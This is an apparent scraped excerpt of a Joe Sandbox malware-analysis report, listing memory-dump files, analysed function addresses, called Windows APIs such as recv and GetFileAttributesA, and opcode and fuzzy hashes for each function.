Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bed916e87a0698637a428e7a89a5f993451eb1370ee9d45d499620d4a5b5b426
Instruction ID: 52826f7b13aa7cf7e8d0155ee3084063b6067a200411fe4468779663ff2cd39d
Opcode Fuzzy Hash: bed916e87a0698637a428e7a89a5f993451eb1370ee9d45d499620d4a5b5b426
Instruction Fuzzy Hash: E5C08C280116010EEE1C093885848A9339949477F83F41B8CE0708B1F1CE357807B210

Function 00F687B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00F6DA1D,?,?,?,?), ref: 00F687B9

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4e7ca28d288d6bb25b8a4c94f54bec4a5080035ea51792a59b106b5ee1de0e2c
Instruction ID: 20fa294b08571fac02f51a2bf8f757ccb28849dcf91506b582ddb8cd49121b1d
Opcode Fuzzy Hash: 4e7ca28d288d6bb25b8a4c94f54bec4a5080035ea51792a59b106b5ee1de0e2c
Instruction Fuzzy Hash: 03C08C380112018EEB1C4A38C58482533699E037B83F00B8CE0318B1F1CF32E403E6A0

Function 00F6B1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F6B3C8

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 08ba2dab40adaefdfd750d5cc81ca0abf222db38237e57010e43a7f71ed5e4b8
Instruction ID: 36d5caf913af5530a7d1a382517015dc5175f62cc42325ac72d3a1d99a61cf48
Opcode Fuzzy Hash: 08ba2dab40adaefdfd750d5cc81ca0abf222db38237e57010e43a7f71ed5e4b8
Instruction Fuzzy Hash: 7FB11770A10268DFEB29CF14CD98BDEB7B5EF05304F5081D9E40AA7281D775AA84CF91

Function 05030891 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1363a5d0d24ee46484b6fc1c65e33d5991a4e29778bdf373fd1d1c8ccc51bed
Instruction ID: e8d5761653c39bc2e4d8193259c9e5dcd124d13b88539388b252979d15b31802
Opcode Fuzzy Hash: e1363a5d0d24ee46484b6fc1c65e33d5991a4e29778bdf373fd1d1c8ccc51bed
Instruction Fuzzy Hash: 4B11269708E210ADE343D2593A3F6FDBA6EA8D7630334813BA497CA542F2C54A5D41F2

Function 05030750 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53252ba54f5170e03fb1a7d1ffe4c3d44f3e0ca222272b8609c763409e714b28
Instruction ID: f13f6eb0ec9f42d6fffcc096f20f3268b31368e24d8c49fd5afaf9f1fcd1387a
Opcode Fuzzy Hash: 53252ba54f5170e03fb1a7d1ffe4c3d44f3e0ca222272b8609c763409e714b28
Instruction Fuzzy Hash: 4111A3EF48E110BDE242C5427B6EAFE6A2FE5D77303318036B48786102F2D1465D65B1

Function 0503076B Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed3e350d558e3126add96eecd07d7ba8a99973e34b247a2057260ef2decd9541
Instruction ID: 30fa29649d8e742ef69e7a69fecc6d9813d9546222344026783c6bf3391e7101
Opcode Fuzzy Hash: ed3e350d558e3126add96eecd07d7ba8a99973e34b247a2057260ef2decd9541
Instruction Fuzzy Hash: CD0192EF48E210BDE242C6427B6E6BD7A6FB5D6330330C076F48792502E2D5475D65B1

Function 050307A7 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbf951b071053b0e5e27aa449d463e5dcf77e9911fa0d6a23db15ffddec46e0a
Instruction ID: e2586e5d6a5d9f47a1d108ca5a3650dcef07f81b070e2da67011e8f395111dd7
Opcode Fuzzy Hash: fbf951b071053b0e5e27aa449d463e5dcf77e9911fa0d6a23db15ffddec46e0a
Instruction Fuzzy Hash: AB01F5EF48A110AED70382422B6EAFD6A6FB4D3230335807AF086D2902F2C5464DA572

Function 050307DA Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db3f044047a88831622dcb6c145e1694887c57b06be8c3e4134d7aea6e3987d
Instruction ID: 913e289de502bf15706092879a9498d87858eab416898e48557989fe949bfe32
Opcode Fuzzy Hash: 3db3f044047a88831622dcb6c145e1694887c57b06be8c3e4134d7aea6e3987d
Instruction Fuzzy Hash: 4AF0B4BF08A214BED742CA42777E6FD766FB99B330331C436F0C782502A191025DA6B2

Function 050307FE Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c719363f3b1238eae69230bae6673e688efacf217247bb1680bb80865ab173
Instruction ID: 801591b037149ba2749d599ab847786068538fc3dac1e6b445d42498e151962f
Opcode Fuzzy Hash: 76c719363f3b1238eae69230bae6673e688efacf217247bb1680bb80865ab173
Instruction Fuzzy Hash: C9F0A7AB48E1109DD342CA4172AB6BD6B9FB5E7330330457AF0C74260291A9425955B2

Function 0503081C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a7be954ae0acc082b50d54e9b91f0a99794f9c0524c5dc068c659c841cd6322
Instruction ID: f89868259eab41fd80f6305a945b7f08fa2c2bfe9d17afc408e61bd9da606e8a
Opcode Fuzzy Hash: 9a7be954ae0acc082b50d54e9b91f0a99794f9c0524c5dc068c659c841cd6322
Instruction Fuzzy Hash: 7DE0DF8B08A110DEC2428242BA6E3FE665E32E37302308232A0C7C264294D50299A1B2

Function 0503082C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea2f3809e5880475cff9be1dfba00a621a2b3104bf41f8fa16ac91fad890ddfc
Instruction ID: 0a0df2639fd8cd92167051345fa306dd056ad0e5ffa5f5e8fe5e3149b25b5f91
Opcode Fuzzy Hash: ea2f3809e5880475cff9be1dfba00a621a2b3104bf41f8fa16ac91fad890ddfc
Instruction Fuzzy Hash: 42E02BAB4893A05EC3839694261A6FD7FBE6C97630374417BF486C7443D286011992B2

Non-executed Functions

Function 00F6E0C0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 00F6E10B
recv.WS2_32(?,?,00000008,00000000), ref: 00F6E140

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 85bf345c623131e12744f62fc5a6537c7b217590e6c2d21f508174e394737fc9
Instruction ID: 7a786230272fc35254c2be41251ea8ff117bd4b17a1dd78cc60b49ac51a42fe9
Opcode Fuzzy Hash: 85bf345c623131e12744f62fc5a6537c7b217590e6c2d21f508174e394737fc9
Instruction Fuzzy Hash: AA31F876E042589BD710CB6CCC86FEB77BCEB09734F040626E514E73D1C674A8459BA0

Function 00F7CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00F7CF52,?,00000003,00000003,?,00F7CF87,?,?,?,00000003,00000003,?,00F7C4FD,00F62FB9,00000001), ref: 00F7CC03

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
